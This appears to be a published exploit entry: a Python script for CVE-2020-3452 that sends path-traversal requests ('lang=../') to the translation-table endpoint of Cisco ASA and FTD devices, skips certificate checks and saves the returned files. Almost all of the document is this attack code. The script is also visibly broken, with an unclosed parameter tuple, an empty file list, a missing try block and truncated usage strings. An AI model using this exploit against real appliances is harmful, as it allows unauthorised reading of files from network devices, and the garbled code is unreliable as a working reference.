Cisco ASA and FTD - Path Traversal (2)







# Exploit Title: Cisco ASA and FTD - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author:
# Vendor Homepage:
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
# Version: ASAs (from version 9.6 to and FTD’s (versions 6.2.3 to
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github :

import requests

# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: {target}"
# Example:"
# Requires - Requests - pip3 install requests
# This tool takes advantage of the above cve and attempts to
# download files as listed below, it is suggested that you make
# a working folder for the outputfiles to avoid confusion if
# attacking mutliple ASA's

# set your target
target = input("Enter target IP/Url: ")

def grabstuff():
    for file in files:
        print("trying: ", file)

        #set request parameters
        params = (
            ('type', 'mst'),
            ('textdomain', '+CSCOE+/'+file),
            ('default-language', ''),
            ('lang', '../'),

        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
        # write the file to the disk
        f = open(file,"w")

# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
files = {

# obvious thing is obvious, try the things and barf if fail
except Exception as err:
    print("Something went wrong sorry")